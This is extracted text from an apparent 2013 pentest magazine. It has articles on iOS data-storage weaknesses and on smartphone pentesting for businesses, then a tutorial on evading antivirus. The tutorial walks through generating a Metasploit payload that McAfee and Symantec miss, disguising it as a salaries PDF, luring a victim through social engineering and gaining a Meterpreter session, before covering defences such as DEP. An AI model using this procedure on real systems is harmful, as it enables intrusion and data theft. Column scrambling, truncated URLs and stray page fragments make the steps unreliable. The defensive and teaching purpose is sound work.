from the phone, the stored data will be deleted with it. Plist files are primarily designed to store the user preferences and application configuration; however, the applications may use .plist files to store clear text access tokens, keys, usernames, passwords and session related information. So, while penetration testing, view all the .plist files available under application’s home directory and look for sensitive information, like usernames, passwords, user’s personal information, session cookies, and so on. Most security conscious developers will store sensitive data in the keychain. The Keychain provides a more secure and encrypted mechanism for storing application specific information than .plist files. The Keychain is an encrypted container (128 bit AES algorithm) and a centralized SQLite database that traditionally holds identities and passwords for multiple applications and network services, but can also store any other string data if the developer decides to do so with restricted access rights. In iOS, keychain SQLite database is used to store the small amounts of sensitive data like usernames, passwords, encryption keys, certificates, and private keys. In general, iOS applications store the user’s credentials in the keychain to provide transparent authentication and to not prompt the user every time for login. Developers leverage the keychain services API or other third party API wrapper to dictate the operating system to store sensitive data securely on their behalf, instead of storing them in a property list file or a plaintext configuration file. On the iPhone, the keychain SQLite database file is located at /private/var/ Keychains/keychain-2.db. Attributes for all the keychain item classes are documented in the Keychain Item class keys and values section in Apple’s documentation (https://developer. The Keychain database is encrypted with a hardware-specific key which is unique per the mobile device. The hardware key cannot be extracted from the device, so the data stored in the keychain can only be accessible on the device itself and cannot be moved to another device. The Keychain database is tied to the device, so even if an attacker obtains access to the keychain through physical access to the file system or in a remote attack, he cannot decrypt and view the file contents. Keychain data is logically zoned and data stored by one application is not accessible to another apOPEN 06/2013

Keychain Storage

plication. Keychain data of an iOS application is stored outside the application’s sandbox. So the operating system process securityd enforces the access control and regulates access to the keychain data in such a way that the applications with correct permissions can read their data. Keychain access permissions of an iOS application are defined in the code sign entitlements. Keychain Services uses these entitlements to grant permissions for the applications to access its own keychain items. With the introduction of data protection mechanisms in iOS, sensitive data stored in the keychain item is protected with another layer of encryption which is tied to the user’s passcode. Data protection encryption keys (protection class keys) are derived from a device’s hardware key and a key generated from the user’s passcode. So encryption offered by data protection API is as good as the strength of a user’s passcode. Data protection is designed to protect the user’s data in case a device is lost or stolen. Since the Keychain is more secure, third party applications usually store the plain text credentials in the keychain to not prompt the user every time for login and to preserve the data across re-installation or upgrading of the application. So while penetration testing, we have to look at the keychain items to see what kind of information is being stored by the applications in the keychain. But the keychain service does not allow viewing the keychain items of any application without proper entitlements. On a jail-broken device, this restriction can be broken and it is possible to dump all the keychain items. So even though the keychain is more secure, if the phone is in the hands of a malicious actor and jail-broken, nothing is safe. Once a phone is jail-broken, you have the keys to the kingdom.

SQLite storage:

SQLite is a cross-platform C library that implements a self-contained, embeddable, zero-configuration SQL database engine. The SQLite database does not need a separate server process, and the complete database with multiple tables, triggers, and views is contained in a single disk file. The SQLite database offers all the standard SQL constructs, including Select, Insert, Update, and Delete. As SQLite is portable, reliable, and small, it is an excellent solution for persistent data storage on iOS devices. SQLite library that comes with iOS is a lightweight and powerful relational database engine

Page 50

that can be easily embedded into an application. The library provides fast access to the database records. As the complete database is operated as a single flat file, applications can create local database files and manage the tables and records very easily. In general, iOS applications use the SQLite database to store large and complex data as it offers good memory usage and speed. The SQLite database that comes with iOS does not have a built-in support for encryption. Most of the iOS applications store lots of sensitive data in plain text format in SQLite files. Unencrypted sensitive information stored in a SQLite file can be stolen easily by gaining physical access to the device or from the device backup. In addition, if an entry is deleted, SQLite tags the records as deleted but not purge them. Therefore, in case an application temporarily stores and removes the sensitive data from a SQLite file, deleted data can be recovered easily by reading the SQLite Write Ahead Log. The SQLite files can be created with or without any file extension. Most common extensions are .sqlitedb and .db.

Caching Mechanisms and File Caching

Caching mechanisms are generally used by developers to store remote data locally in order to increase performance and reduce network load. Oftentimes developers will roll their own caching solutions, but generally they will use a third party library such as the popular EGOCache (https:// in order to provide caching functionality. These solutions simply persist data to local storage in a structured format. These caches are often times stored in plain text and easily viewable using tools such as iExplorer on a non-jailbroken device. Along with caching mechanisms, .plist files, SQLite files, binary cookies and snapshots, iOS applications can store other format files like pdf, xls, txt, and so on, when viewed from the application.

In an effort to learn how users type, iOS devices utilize a feature called Auto Correction to populate a local keyboard cache on the device. The keyboard cache is designed to autocomplete the predictive common words. The problem with this feature is that it records everything that a user types in text fields. The cache keeps a list of approximately 600 words. The keyboard cache is located at Library/ Keyboard/en_GB-dynamic-text.dat file. To view the Keyboard cache (, copy the en_GB-dynamic-text.dat file to a computer over SSH and open the file using a Hex Editor. The keyboard cache does not store the information typed in the fields that are marked as secure. By default, passwords and strings with all digits (pins and credit cards) are marked as secure. Hence, the data typed in those fields does not store in the keyboard cache. However, data typed in other text fields like username, security questions and answers might get stored in the keyboard cache. During a pentest clear the existing keyboard cache by navigating to iPhone Settings -> General -> Reset -> Reset Keyboard Dictionary, then browse the application and enter data in the text fields, and analyze whether the data is getting stored in the keyboard cache or not.

Keyboard Cache

Snapshot Storage

Pressing the iPhone home button shrinks the iOS application and moves it to the background with a nice effect. To create that shrinking effect, iOS takes a screenshot of the application and stores it in the Library/Caches/Snapshots folder in the respective application’s home directory. This might result in storing the user’s sensitive information on the device without user’s knowledge. Snapshots stored on the iPhone will automatically clear after the device is rebooted.



Most of the iOS applications do not want to prompt the user for login every time. So, they create persistent cookies and store them in cookies.binarycookies file on the application’s home directory. During the penetration test, investigate the cookies.binarycookies file for sensitive information, and to find session management issues. Cookies.binarycookies is a binary file and the content is not in a readable format.
OPEN 06/2013

Along with the keyboard cache, when a user copies data from a text field, iOS stores the data into a pasteboard (clipboard in other operating systems). The pasteboard is shared among all the applications, so the information copied in one application can be accessed from other applications by reading the pasteboard.

Push Notification

Often overlooked during a mobile pentest is the analysis of push notifications. Applications use

Page 51

push notifications for various reasons and can display an alert or banner on the device, play a sound, or put a badge on an application’s icon. Apple’s iOS allows some tasks to truly execute in the background when a user switches to another app (or goes back to the home screen), yet most apps will return and resume from a frozen state right where they left off. Alerts or banners have the ability to open the application when an action button or banner is tapped. If used, the following information can be obtain through this vehicle: • Company confidential data or intellectual property in the message payload: Even though end points in the APN architecture are TLS encrypted, Apple is able to see your data in cleartext. There may be legal ramifications of disclosing certain types of information to thirdparties such as Apple. • Push used for critical notifications: The push architecture should not be relied upon for critical notifications. iPhones that are not connected to cellular data (or when the phone has low to no signal) MAY not receive push notifications when the display is off for a specific period since Wi-Fi is often automatically turned off to preserve battery. • Push notification handler to modify user data: In this case, the user of the application may not have intended to perform any transaction that results in the modification of his or her data. • Validate outgoing connections to the APN: The root Certificate Authority for Apple’s certificate is Entrust. Make sure pen testers have entrusts root CA certificate to verify your outgoing connections (that is from the server side architecture) are to the legitimate APN servers and not a rogue entity. • Potential Unmanaged Code: Look for memory management and bounds checking issues by constructing the injected payload outbound to the APN using memory handling API in unmanaged programming languages. • SSL certificate and list of device-tokens in your web-root: Look for inadvertently exposed Ap ple signed APN certificate, associated private key, and device-tokens in the device web-root. Applications that support push notifications on the iOS platform used to use a UDID to identify the device, but now they use a device token. This device token is passed to the application after a user agrees to receive push notifications when prompted by the app.
OPEN 06/2013


• Hacking and Securing iOS Applications by Jonathan Zdziarski • “Apple iOS 4 Security Evaulation” by Dino Dai Zovi •

Error Logs

In general, iOS applications write data into logs for diagnostic and troubleshooting purposes. In addition, during development, applications developers commonly use NSLog for debugging purposes. These logs might include requests, responses, cookies, authentication tokens, and other sensitive data. On the iPhone, data passed to the NSLog function is logged by Apple System Log (ASL) and the data remains on the log until the device is rebooted. Also, error logs are not bounded by the application’s sandbox. Which means error logs generated by one application can be read by other applications. Therefore, if an application logs sensitive data, a malicious application can actively query for this data and send it to a remote server.


In summary, in order to adequately test mobile applications, it is worthwhile to take the time to learn the underlying architecture of the operating system and techniques used by developers. This way, pentesters can quickly determine what rocks to turn over and find vulnerabilities.

Michael Trofi is a security consultant and CSO for CST Strategic Advisors. He has over 30 years of experience in system deployment and development and over 15 years in Information Security. He has a degree in Digital Electronic Engineering and holds certificates such as CISSP, CISM and CGEIT. At CST Strategic Advisors, Michael focuses on security governance, compliance, threat modeling, risk assessment, policy development, internal/external network penetration testing, mobile and application penetration testing and other areas in security.

MicHael Trofi

Duane Schleen has over 19 years of experience developing enterprise software solutions and has been architecting and developing mobile applications since 2001. He has both produced and developed multiple top selling applications on the App Store since the iOS SDK was first released in 2008. He resides in Golden, CO where he works as an iOS Developer.

DUane ScHleen

Page 52

Starter Kit 03/2013

Smartphone Pentesting Could Save your Business
Can you imagine a fully functional company without mobile phones nowadays? Even though these seem like an immense blessing, we cannot forget that they sometimes might do more harm than good. In this article you will read about the basics of pentesting and how you can use it to improve company security in the particular area.

Article comes from Pen Test Starter Kit. Download the complete issue.

ho needs pentesting for smartphones? The honest answer is that most businesses do. Company owned phones are often allotted to employees so they can work better. But these little crafty devices can become the source of mayhem in the case of a data leak, hack, data breach, and a whole host of other problems. And it’s not just company owned phones; the BYOD culture has taken every work environment by storm, and the dust doesn’t seem like it’ll settle anytime soon. Most companies have opened their arms to this trend and embraced it like a long lost child. However, there’s a very real risk that a BYOD phone brings to the table for firms. Pentesting has never before been as important for businesses who want to stay secure. A combination of pentesting for smartphones and education for employees in terms of security issues could go a long way.


Why Pentest Smartphones?

IT departments globally are adding more coal to their security engines simply because malware and Trojans are becoming too common a phenomenon. In most cases data is extracted from a smartphone and delivered elsewhere with the victim never knowing what happened. In an ideal world IT firms should education employees in terms of data
OPEN 06/2013

security, and provide them with tools to get it done right. However, many firms often fail to ensure that their work environment is one that promotes a security aware culture. Data protection should come to employee’s naturally once they’ve been trained to do so. But this is not the case. More often than not, employees do not have any regard for security – at times intentionally, but often simply because they don’t know what to do for it. It is important that firms make sure they analyze all points of access for potential data leaks/ hacks/etc. But it gets trickier when you realize you’re talking about data protection and control on a device that you don’t even own. Within the office space, company owned equipment is relatively easier to manage. You can setup protocols for how company owned devices will be used, managed and maintained. Smartphones are harder to keep a check on because once they’re allotted to an employee, no company goes running after them every second to check whether they’re maintaining data in a safe manner. That being said, you can still control how an employee manages their phone to an extent, if it is company owned. BYOD, however, is a whole different story altogether. Businesses are increasingly allowing BYOD presence because they’re not just cost ef

Page 54

fective but also help promote continuity in terms of work. And while they present great opportunities for effective growth, what they do not allow is control. You cannot take an employee’s phone and regulate it like you could an office device. There’s no legal way of tracking said phones, you can’t alter their system so they’re more secure. As more and more employers allow BYOD to infiltrate their work environments, they forget that they can’t limit failures caused by said devices. And this is where pentesting comes in. It basically tries to look into how and why a smartphone became vulnerable in the first place. iViZsecurity. com undertook research in 2012 which showed that over 99% web apps have at least one vulnerability, while 82% have a vulnerability that is highly critical – and that’s just one mode of infiltration, albeit it’s one of the most popular ones. Anything that is downloaded into a phone can kick the doors open a little wider for malware to stroll in. There are a few main areas that are directly affected when personal smartphones are made part of the official work environment.
a d v e r t i

Company information and data

Employees access all kinds of information on their smartphones; with the rapid addition of features over the course of the last few years, simply viewing files isn’t enough, there are several occasions where employees actually create entire documents as well. CISCO conducted a recent research where they looked into insider threats i.e. employees and the trouble they can cause. The global report analyzed data loss and leakage that came from an employee’s misdoings or mistakes. The white paper reported that around 39% of IT professionals around the globe are more concerned about threats that stem from their own employees, rather than outside attacks from hackers. On top of that, 27% admitted they never found out what been happening in terms of data loss trends that have gradually seen a hike in the recent past. Tackling a leak from within isn’t an easy challenge. Pentesting provides an opportunity to help seal backdoors and eradicate loopholes. It isn’t just company information and data that’s at stake. Company contacts are also in the line of
s e m e n t

OPEN 06/2013

Page 55

Starter Kit 03/2013
fire. Every single official email that an employee accesses on their phone not only exposes the data and content within the emails but all company contacts as well. Which means, in addition to the leak/loss of information, what we’re looking at is someone potentially getting a hold of every important contact that the company has. These contacts can then be manipulated by whoever has accessed them. It could be a competitor or it could just be a hacker. There is no predicting harmful behavior in the digital world. For a long time now people have had issues with adware running rampant. Free apps fitted with adware extract data so that they can further promote goods and products based on a person’s taste – however, they can also go and tamper with other data on the phone. Additionally, it is important to understand that smartphones are not stand alone devices. Eventually, they will be connected to another official device such as an office desktop or laptop. In the event that a phone’s been infiltrated and has some form of malware, virus, or monitoring software, it’s possible that it can attach itself to the device that the phone connects to. Companies invest a great deal in security and VPNs are thought to be the big saviors when it comes to secure data access. Hackers, malicious apps and software cannot get into the VPN, but if they’re manipulated from within through a phone then the game changes. As soon as the phone is connected to the office network data becomes at risk. Company data could be put into the more secure vault on the planet, malware that’s using a BYOD won’t even bat an eyelash before it steals something. In that situation pentesting becomes all the more important. do not secure user account names. There’s no encryption there. If an employee is using an app to access company information then that’s a real cause for concern. And the company wouldn’t actually ever find out unless they ran the phone through some form of check. Smartphones are all about the apps. Be it free or paid, apps have access to multiple strands of data on the phone. Without ensuring that these apps aren’t taking out or recording more than they should from the phone, a company shouldn’t rest. Another problem is the customization of phones. If you jailbreak or root a phone then there’s a whole new world of risk that you’re exposing it to. There’s an additional risk factor involved which shouldn’t be there to begin with. While company owned phones can be controlled in terms of this, a BOYD device which has been jailbroken or rooted presents disturbing consequences. Take the example of an iPhone, if it’s jailbroken then that means the SSH password can be accessed by anyone because it’s literally the same password as any other jailbroken iPhone. With that information anyone can log into the root of the phone and there’s no controlling what they steal or damage from that point onwards. This is nothing compared to the horrors that the android platform has seen. You don’t even need to root your phone for it to be open to a plethora of problems. In the past apps from within the PlayStore have been malicious. Even when an app is not malicious, often it asks for permissions and access to parts of the phone that have nothing to do with it. Android apps do not allow the user to pick and choose what it gives an app access to. While one collects a certain kind of data, another bad app could swoop in and steal all of it. Adware apps do this all the time. And Google in the past hasn’t taken such an active charge against such issues. Androids continue to be the most insecure smartphones around. Cell phone tracking apps and monitoring apps have also been known to hide within phones that have been jailbroken or rooted. And in many cases the phone owner never finds out because these apps have the ability to hide within the user’s phone. They keep transmitting information and data constantly and the user has no clue. Third party apps in general are a big problem for such phones. Companies in general have absolutely no say in whether their employees jailbreak or root their phones, they can however take preventive action against malware threats. They

What’s creeping in

Malware branches out into malicious apps that can easily grab your employee’s phone control and extract whatever data they please. One of the primary routes they take is through exploiting bugs within the phone’s apps, browser and even the its kernel. Malicious apps or web pages can easily hit these bugs and use them like hidden backdoors. The phone owners can open a slew of bad links, or download numerous bad apps before realizing that there’s trouble. Free apps are a major contributor to the problem and pose risks which are far more serious than their paid counter parks. VIA Forensics recently conducted a study where it outlined how 75 percent of the apps on a phone
OPEN 06/2013

Page 56

should also create a policy disallowing the rooting or jailbreaking of their own devices while their employees is using them.

The big test

applied to company owned devices (if an official policy has been setup before), the same cannot be said for BYOD. In that scenario this would be the most useful. White box This form of test simulates an attack from the inside. Both the tester and the user know of the test. It’s meant to check how insider information can be misused. Grey box Tests attack with partial data about the cell phones. Users, both ones with company owned devices and those with BYOD have complete knowledge of the test that’s being conducted. This is a kind of middle ground between a black box test and a white box text. It helps reduce the time spent in attacking a system to highlight its vulnerabilities. This can be taken as the most appropriate method to execute a pentest for smartphones.

What will a pentest actually look for? What will it help resolve? These are importantly questions you should ask yourself before you actually get a pentesting session. Ideally all phone platforms should be given a pentest i.e. Android, iPhone, BlackBerry and Windows Phone. The test should look at external as well as internal threats to smartphones. It is possible that employers would benefit from a combination of pentests instead of one large pentest that overlooks the entire problem. There are multiple service providers on the internet that can help tackle this situation. There are different kinds of tests which should be implemented for the best possible results and the most secure outcome. Pentesting isn’t a simple process that takes you from point A to point B. There are several different methods of checking on the security of a particular platform, in this case it’s smartphones. Typically the employer should be able to point out how much data goes back and forth between the pentesters and the users. The different types of pentests that can be implemented are as follows: Blind This form of a test would hold that the smartphone owners would not know that a security check is underway. The security team is the one that’s being tested. For all types of firms this is useful when training their own people on how to check for security loopholes within the systems. If pentesters are subjected to this, it’ll be a good way for the firm to confirm their abilities as well. Double Blind The ones doing the testing don’t know how the system works and the ones that are being tested on don’t know that a test is being conducted. This is an ideal situation because the employees will not be able to alter or change any data on the phone prior to it being checked, and like the blind test the advantages remain the same from the testers end. Black box A Black box test only has the testers go blind while the users know that a test is being conducted. While both blind and double blind methods can be
OPEN 06/2013

Some options to choose from

The good people at offer a complete pentesting solution. Their focus lies more on all mobile devices rather than just smartphones. However, their process is extremely comprehensive and they do address smartphones as well. Their approach to pentesting is simple i.e. they begin to ask who’s using the devices and what (official devices) they’re being connected to. Different methods of exploitation are visited through their services and they help outline where security for the phone has gone wrong. It’s not just the software of the phone that’s addressed but also the social engineering i.e. changes in attitudes and behaviors towards security, that are highlighted through their services. offers a slightly different service than a lot of other pentesting firms. Their Hybrid pentesting services measure mixed types of attacks. This includes four main components i.e. attacks from trusted networks, wireless networks, attacks on smartphones and lost/stolen devices. Within the context of smartphones the firm can measure what data is lost/stolen over a trusted network from company owned devices. Such networks have a lot less restrictions as opposed to networks that aren’t trusted and a lot of data passes over them. If such a network is already compromised then it’ll take the phone’s data down with it; the same is the case with wireless networks. Under this service smartphones

Page 57

Starter Kit 03/2013
will be tested against industrial espionage which takes place through trojaning of the phone. Pentesting activities would include simulation of malicious activity with the main aim of verifying data encryption, device tracing measures, system blockages etc. offer what they call a security audit system. Their main focus lies on the top most controls on a smartphone. They start by outlining what the sensitive data on a cell phone is, and then testing to see how that data is best protected on the mobile device. Password security is also checked and tested on the device to see whether it’s adequate or not. Data travels back and forth over phones constantly. There’s a plethora of information that is exchanged. The pentest from Nethemba also ensures that data, while it’s being transmitted from the device and to the device, remains safe. This is important for sensitive data. The implementation of authorization/ authentication from the user end is also taken into account. Third party applications are a huge problem, and the test tries to check whether the data integration with said services is secure or not. It also applies controls to ensure that paid resources are kept safe and secure. The complete test has a total of 10 main points which are addressed which means that the pentest from this site covers a lot of aspects. What is important for ensure that whatever measures being taken are the ones that directly impact the firm. Of course there are firms that will need a more customized solution and may want to develop their own protocol for pentesting. Bulbsecurity. com has its own smartphone pentest framework. The main aim of this framework is to allow employers to make use of their tool in the most effective and efficient manner possible. What the tool basically does is evaluate the security of the phone in the context of the environment that is exits in. This particular framework as developed under the DARPA Cyber Fast Track grant. At present the tool up on the site is an open source option that IT departments might be able to actually tweak to their own requirements. It’s main purpose is to help facilitate pentesting within an organization. Version 0.1 of the framework has provisions for remote attacks, social engineering attacks, client side attacks along with post exploitation, aiming at smartphones. It’s basically a set of features that can help outline how vulnerable a system really is. The framework can also be fitted in with other devices and tools for a better reOPEN 06/2013

On the Web – Cell Phone Tracker – First Base Technologies – High-Tech Bridge – Nethemba – Bulb Security web-application-vulnerability-statistics-of-2012/ – research

sult. For instance, you can integrate tools such as Metasploit and SET into the framework for a more comprehensive test.


There are important questions you need to ask yourself as a business administrator/owner. Could the apps on BYOD devices land devastating blows to your business? Can internal data be jeopardized because of synchronization of office equipment with BYOD phones? The threat is a very real one, but only pragmatic firms know when to act, and how to act. For firms that are dealing with data on a daily basis the likelihood is that staying vigilant is the only answer. In this era even cupcake shops have to make sure they have secure passwords; an IT firm cannot afford to not stay one step ahead. At the end of the stay it’s more about keeping your eyes and ears open than anything else. You can put the biggest and best padlocks on your information but if you forget to close your windows then it’s all pointless. It wouldn’t be a stretch to say that pentesting for smartphones is becoming imperative for businesses in recent times.

Jane Andrew writes about everything and anything that touches on security and privacy within the digital world. Her main focus lies on looking at both cell phone and PC to see which parts are the most vulnerable. She writes for Mobistealth and several other leading websites. She can be reached – @janeandrew01.

Jane Andrew

Page 58


AV Evasion:
Bypassing AV Products and Protection Against It
AV evading techniques are getting better and smarter by the day, and having just an Anti-Virus and Anti-Spyware application is insufficient to protect our machines from additional angles of threats.

Article comes from PenTest Regular TO BE RELEASED


s more and more threats emerged, so do the Antivirus product vendors, who are consistently trying to keep up with the emerging threats, virus signatures, variants, and behaviors. It has always been a topic of interest to hackers/pentesters everywhere – the ways to bypass security products, from firewalls, Anti-Virus, Anti-Spyware, Intrusion Detection System, etc. One of the most common technique attackers try to evade is the Anti-Virus application, as this feature will most likely be responsible for stopping the malware, viruses, and malicious executables from executing on the victim’s machine. Thus, resorting the attackers to find new ways and processes to evade the application.

as an open source by NCC Groups Plc. Its features include: • Generating Metasploit executable payload to bypass AV detection, • Generating a Local or Remote Listener, • Disguising the executable file with a PDF icon, • Execution of executables are minimized on the victims computer, • Automatically creates AutoRun files for CDROM exploitation. To install metaploitavevasion, fire up BackTrack or Kali and run the command (see Figure 1):
#git clone


The purpose of this article is to provide an end to end and step by step approach on the process of creating an executable that is able to evade AV detection and how it can be executed to provide a meterpreter session to the attacker. This article also describes the ways to prevent such attack/ threat from the perspective of product vendors and Windows security settings itself.

Figure 1. Installing metasploitavevasion

Before We Begin

Metasploit AV Evasion is a payload generator that avoids most Anti-Virus products. It was released
OPEN 06/2013

Figure 2. Start the metasploitavevasion by running the #./

Page 60

Providing Access to
#chmod a+x

Creating the Executable To execute it, go to the metasploitavevasion directory and run the command (see Figure 2):

run it. To make it more interesting, I renamed the file Employees Salaries-Confidential.pdf, and by default Windows 7 and Windows Server machines hide the extension of the files. And with the pdf icon embedded to it, it is more believable (see Figure 7).

Testing Against Symantec AV and McAfee AV

Select local or remote system. If you select local, it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end (see Figure 3). In this case I used port 443 (see Figure 4). There are five options for the payload. The stealthier you choose, the bigger the file is and the more random data it creates with the intention to reduce the detection ratio. In this case, I have chosen option 5, which is Desperate Stealth (see Figure 5), and it generated an executable with the size of 135 MB. It will then output an executable called salaries.exe in the /root/ metasplotavevasion/ directory (see Figure 6). You can copy this to your CD or Thumbdrive and use a phishing/social engineering techniques to take advantage of the curiosity of the system’s owner to

To test my newly created executable, I used McAfee and Symantec Endpoint Protection AntiVirus and Anti-Spyware feature to see whether it gets detected (see Figure 8). Note: Both used products have the Anti-Virus and Anti-Spyware feature only. Test Case 1: Scanned against McAfee Result: Undetected Test Case 2: Scanned against Symantec Endpoint Protection (see Figure 9) Result: Undetected Note: The date of this article being written was 14th July 2013.

Starting the Payload Handler and Listener

We will then run msfconsole and start the listener on a dedicated attacking system (see Figure 11).

Figure 6. Executable created

Figure 3. Entering the IP of the listener

Figure 7. Changing the name of the executable to something believable

Figure 8. Scanning the file against McAfee AV Figure 4. Choosing what port to be used to listen on

Figure 5. The more stealth you want, the bigger the size of the file

Figure 9. Scanning the file against Symantec AV

In this scenario, we are using the following specifications for the victim’s machine: • Windows Server 2008 SP2 (64bit) and Windows 7 Enterprise SP1 (64bit), • Data Execution Prevention settings is set to Turn on DEP for essential Windows Programs and Services only, • Symantec Endpoint Protection v11.x Antivirus and Anti Spyware Protection only. and AntiSpyware scans rely mostly on signatures to detect known threats. Proactive threat scans use heuristics to detect unknown threats. The Heuristic process scan analyzes the behavior of an application or a process. The scan determines if the process exhibits the characteristics of a threat, such as Trojan horses, worms, or key loggers. The processes typically exhibit a type of behavior that a threat can exploit, such as opening a port on a user’s computer. This type of protection is sometimes referred to as protection from Zero-day attacks.

Execution of Employees Salaries-Confidential.pdf

Both machines, when the Employees Salaries-Confidential.pdf was executed, allowed us to get a meterpreter session (see Figure 12) despite having an updated definition of Symantec Endpoint Protection.

Testing the Employees Salaries-Confidential. pdf on the System with Proactive Threat Protection and Network Threat Protection Enabled
As soon as we launched the Employees Salaries-Confidential.pdf, Symantec Endpoint Protection was automatically able to detect and block the

Prevention (I)

To prevent such an attack, additional features from product vendors do come in handy. In this case, Symantec Endpoint Protection comes with features like Proactive Threat Protection and Network Threat Protection.

Symantec’s Proactive Threat Protection

Proactive threat scanning provides an additional level of protection to a computer that complements existing AntiVirus, AntiSpyware, Intrusion Prevention, and Firewall protection technologies. AntiVirus

Figure 13. Symantec Endpoint Protection client with additional features

Figure 10. The version of the Symantec Endpoint Protection client used

Figure 14. Symantec’s IPS in action

Figure 11. Starting the Payload Handler

Figure 12. A Meterpreter session
OPEN 06/2013

Figure 15. The security log of Symantec Endpoint Protection
Page 62

attack and classify the attack as a Meterpreter Reverse TCP attack (see Figure 14). In the Security Log (see Figure 15), it is able to log the event, the type of attack, where the attack originated from, and the full path of the executable.


Prevention (II)

In the previous test, the DEP (Data Execution Prevention) (see Figure 16) setting was set to Turn on DEP for essential Windows programs and services only. In this test, we are going to set the setting to: Turn on DEP for all programs and services except those I select. When the Employees Salaries-Confidential.pdf was executed, DEP responded by closing the executable from executing thus protecting the system from providing a meterpreter session to the attacker (see Figure 17).

• DEP (Data Execution Prevention): http://windows. • Symantec’s Proactive Threat Protection: http:// ontent&id=TECH102733 • Symantec Endpoint Protection: • McAfee Anti-Virus: • Metasploit AV Evasion: • Metsploit Payload Generator Script: http://www. • BackTrack Linux: • Kali Linux:


What is DEP?

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files. DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.
Figure 16. Data Execution Prevention Option

AV evading techniques are getting better and smarter by the day and as shown in the above tests, having just an Anti-Virus and Anti-Spyware application is insufficient to protect our machines from additional angles of threats. To defend from such attacks, product vendors have since made their applications to come with several other features, such as IPS (Intrusion Prevention System), IDS (Intrusion Detection System), Firewall, and NAC (Network Access Control). These features will perform additional levels of security and protection to handle more advanced and newer threats and attacks that traditional Anti-Virus and Anti-Spywares feature could not.

Figure 17. DEP in action
OPEN 06/2013

Graduated with a BSc Degree in Cyber Forensics, Information Security Management and Business Information Systems, Fadli is a security professional at BT Global Services, a company that offers specialized IT security services to customers worldwide. He has over 7 years experience in the IT industry dealing with operations, support, engineering, consulting, and currently an ethical hacker performing vulnerability assessment and penetration testing services for domains such as Network Assessments, Wireless Assessments, Social Engineering, Perimeter Device Assessment, and Web App Assessments through Open Source and commercial tools based on methodologies from OWASP and OSSTMM. Fadli has also conducted trainings and speaking at seminars on the topics of information security to both the private and government sectors. In his free time, Fadli conducts security research and regularly updates his blog focusing on IT security @


Page 63

Specializing in security services including:
Penetration Testing • PCI DSS • FedRAMP • ISO 27001 • 888.575.7450

Sponsor Documents

Or use your account on


Forgot your password?

Or register your new account on


Lost your password? Please enter your email address. You will receive a link to create a new password.

Back to log-in